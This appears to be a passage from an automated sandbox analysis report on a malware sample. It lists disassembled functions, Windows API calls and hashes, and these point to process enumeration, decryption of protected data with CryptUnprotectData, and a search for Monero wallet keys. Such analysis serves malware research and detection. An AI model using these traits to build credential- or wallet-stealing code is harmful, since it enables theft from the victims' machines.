                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ! _X$L-vp$ad|=$})z}
                                • API String ID: 0-1120557342
                                • Opcode ID: 6422c6724d45e3c807b5c2ae57f76f8cfabb47e0880055f5ecac14af399c41d8
                                • Instruction ID: c42235fd94b522e635016d6daffad3eeee735d5247e017413b5dc2e379d94ccc
                                • Opcode Fuzzy Hash: 6422c6724d45e3c807b5c2ae57f76f8cfabb47e0880055f5ecac14af399c41d8
                                • Instruction Fuzzy Hash: 68B2F5F260C204AFE304AF29EC8567AF7E9EF94720F16893DE6C583744EA3558448797
                                Function 00ED8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00EE05B7), ref: 00ED86CA
                                • Process32First.KERNEL32(?,00000128), ref: 00ED86DE
                                • Process32Next.KERNEL32(?,00000128), ref: 00ED86F3
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • CloseHandle.KERNEL32(?), ref: 00ED8761
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 50e09dcdf99f9911258bf66980351c293388fcd6e84de577f4d2d4a532e42f37
                                • Instruction ID: 3cffa5143db88a72889eb7ee19f1da0149e138b355601ddf7f30c84e44249211
                                • Opcode Fuzzy Hash: 50e09dcdf99f9911258bf66980351c293388fcd6e84de577f4d2d4a532e42f37
                                • Instruction Fuzzy Hash: 70315971901258ABCB29DF51DC55FEEB7B8EF44700F1041AAB50AB2290DB706B86CFA1
                                Function 00ED8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00EC5184,40000001,00000000,00000000,?,00EC5184), ref: 00ED8EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 7c1cfab1a4227254558c828736f56c21e5f594c6d645e725aecd44a6c75f6cbc
                                • Instruction ID: c34a518d7062d05fc6c5d07a17cd2c98fcc940a1db4679dea9fa724ad670a13d
                                • Opcode Fuzzy Hash: 7c1cfab1a4227254558c828736f56c21e5f594c6d645e725aecd44a6c75f6cbc
                                • Instruction Fuzzy Hash: 7611F874600208BFDB04CF64E984FA633AAEF89304F10A559F9299B340DB75E982DB60
                                Function 00ED7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00EE0E00,00000000,?), ref: 00ED79B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED79B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00EE0E00,00000000,?), ref: 00ED79C4
                                • wsprintfA.USER32 ref: 00ED79F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 113284afd500bdcb37418d92ba939f8a9e4e671030505ee2e18c53b44aa7fa9c
                                • Instruction ID: 9c6430193019e79092253c34bcea7f8e2c5b2638c4ba2fe9fb447bd41a856e93
                                • Opcode Fuzzy Hash: 113284afd500bdcb37418d92ba939f8a9e4e671030505ee2e18c53b44aa7fa9c
                                • Instruction Fuzzy Hash: 2C112AB2944218ABCB14DFD9ED45BBEB7F8FB4CB12F10411AF655A2284E2795940C7B0
                                Function 00ED7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,01B8DC08,00000000,?,00EE0E10,00000000,?,00000000,00000000), ref: 00ED7A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED7A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,01B8DC08,00000000,?,00EE0E10,00000000,?,00000000,00000000,?), ref: 00ED7A7D
                                • wsprintfA.USER32 ref: 00ED7AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: 94a84f2ff79129fbe6f4a9e2b7ab1ee46f1ffadb76bb21149a17e70319e63a58
                                • Instruction ID: 8c4dc444db1fcb010948fca9d1e51fbc6a63f995d3acc0e45d4ef4f40a3b51f8
                                • Opcode Fuzzy Hash: 94a84f2ff79129fbe6f4a9e2b7ab1ee46f1ffadb76bb21149a17e70319e63a58
                                • Instruction Fuzzy Hash: A4113CB1E45218EBEB248B54DC49FA9B778FB44721F1042AAE91AA3280D7745A81CB51
                                Function 0129A03D Relevance: 6.0, Strings: 4, Instructions: 955COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 1$>~$Y':$o8yw$wz
                                • API String ID: 0-1617110467
                                • Opcode ID: b6bd56849ec6d9e0534ddad1816c773cc84302444b67992251224fc7bfd0921f
                                • Instruction ID: caf2bf0b3ed5b086cb1c3b6cfe02d6b5505d5d4b1706b54c26d2508a20827596
                                • Opcode Fuzzy Hash: b6bd56849ec6d9e0534ddad1816c773cc84302444b67992251224fc7bfd0921f
                                • Instruction Fuzzy Hash: 1852F9F36082009FE304AE2DDC4576AF7EAEFD4720F1A492DEAC4D7744EA3598118696
                                Function 012A1FC2 Relevance: 5.4, Strings: 3, Instructions: 1652COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 4*_d$DfdI$Q(?o
                                • API String ID: 0-882734109
                                • Opcode ID: 6ef4c4bbae00900cb9c28ca82f72e917717a653ce02254d35f561892410bb20c
                                • Instruction ID: 7f81681f43c8393cb4eb87ce6682fcf1b5d4a1c211373e989fb5e90af6259922
                                • Opcode Fuzzy Hash: 6ef4c4bbae00900cb9c28ca82f72e917717a653ce02254d35f561892410bb20c
                                • Instruction Fuzzy Hash: 3BB2F7F360C204AFE704AE2DEC8567ABBE9EF94720F16493DE6C4C7740E67598018796
                                Function 0128DD91 Relevance: 5.3, Strings: 3, Instructions: 1526COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Mq?$zx+-$.}
                                • API String ID: 0-4024853454
                                • Opcode ID: 4d1f0a96ef4693d4a56799d7517df0a7e11c980a27d3b53de96c3e3205e98322
                                • Instruction ID: e3b567bc59b32b9985078e6b30d3cb12c28238eec8d66f931056b6233b40567c
                                • Opcode Fuzzy Hash: 4d1f0a96ef4693d4a56799d7517df0a7e11c980a27d3b53de96c3e3205e98322
                                • Instruction Fuzzy Hash: B3A207F3A086049FE704BE2DEC8577ABBE5EF94320F1A493DEAC483744E63558158687
                                Function 00ED3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.COMBASE(00EDE118,00000000,00000001,00EDE108,00000000), ref: 00ED3758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00ED37B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: ee3dbc931606177f290133f550e284453de3f0735e773c3d1d988fc295c370e1
                                • Instruction ID: 3a5a858a3c8598385ae9368f0ee89dead2a36963bef1c2a124236c8cd4695b99
                                • Opcode Fuzzy Hash: ee3dbc931606177f290133f550e284453de3f0735e773c3d1d988fc295c370e1
                                • Instruction Fuzzy Hash: 76410974A00A189FDB24DB58CC84B9BB7B5FB48302F4051D9E608AB2D0D7B16EC6CF50
                                Function 00EC9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EC9B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00EC9BA3
                                • LocalFree.KERNEL32(?), ref: 00EC9BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 473b8a08ad182989497481f07f0683924c9d612bd06e7c0661a0e6ee28685c29
                                • Instruction ID: 339e0c453d368c8636bbe19eef3a5e6092bb80eed05183306e46ec3c73f58b10
                                • Opcode Fuzzy Hash: 473b8a08ad182989497481f07f0683924c9d612bd06e7c0661a0e6ee28685c29
                                • Instruction Fuzzy Hash: 7C11F7B8A00209EFCB05DF94D989EAEB7B5FF88300F1045A8E815A7344D771AE51CFA1
                                Function 0129120A Relevance: 4.1, Strings: 2, Instructions: 1627COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ,=$CZc
                                • API String ID: 0-4267854955
                                • Opcode ID: 56e0bf55f7102340bd59da046f7c2f206cc1af8e60442abfc2e73926eb8c4cd7
                                • Instruction ID: 9423ff2d12db0887533e6880ee138a5702bab15705f9fcb485680c52813f5270
                                • Opcode Fuzzy Hash: 56e0bf55f7102340bd59da046f7c2f206cc1af8e60442abfc2e73926eb8c4cd7
                                • Instruction Fuzzy Hash: 96B239F3A0C614AFE3046E2DEC8566AFBE9EF94320F1A453DEAC4C7744E63558018697
                                Function 00ECF68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EE15B8,00EE0D96), ref: 00ECF71E
